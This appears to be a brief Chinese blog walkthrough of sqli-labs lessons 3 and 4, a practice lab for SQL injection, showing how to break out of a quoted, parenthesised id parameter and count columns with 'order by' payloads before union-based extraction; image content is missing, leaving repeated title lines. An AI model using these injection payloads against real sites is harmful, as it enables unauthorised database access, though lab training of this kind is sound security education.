sqli-labs第三,四题

sqli-labs第三,四题

 

 1.根据提示输入id参数

sqli-labs第三,四题

sqli-labs第三,四题

 

2.注入单引号

sqli-labs第三,四题

单引号被一对单引号包围,判断sql中id参数是字符串型,且被小括号包围

猜测sql语句为:"SELECT * FROM table_name WHERE id=(‘$id‘) LIMIT 0,1"

 

3.构造布尔表达式,确认注入漏洞

sqli-labs第三,四题

sqli-labs第三,四题

 

4.使用oeder by子句爆列数

?id=1‘) order by 1 %23

正常

?id=1‘) order by 2 %23

正常

?id=1‘) order by 3 %23

正常

?id=1‘) order by 4 %23

报错

sqli-labs第三,四题

得到列数为3列

 

5.union查询

sqli-labs第三,四题

 

6.查询敏感信息,完成攻击

sqli-labs第三,四题

 

 

第四题

第四题与第三题类型相同,将单引号换为双引号即可。

sqli-labs第三,四题

上一篇:BUUCTF[归纳]sql注入相关题目


下一篇:MySQL 读写分离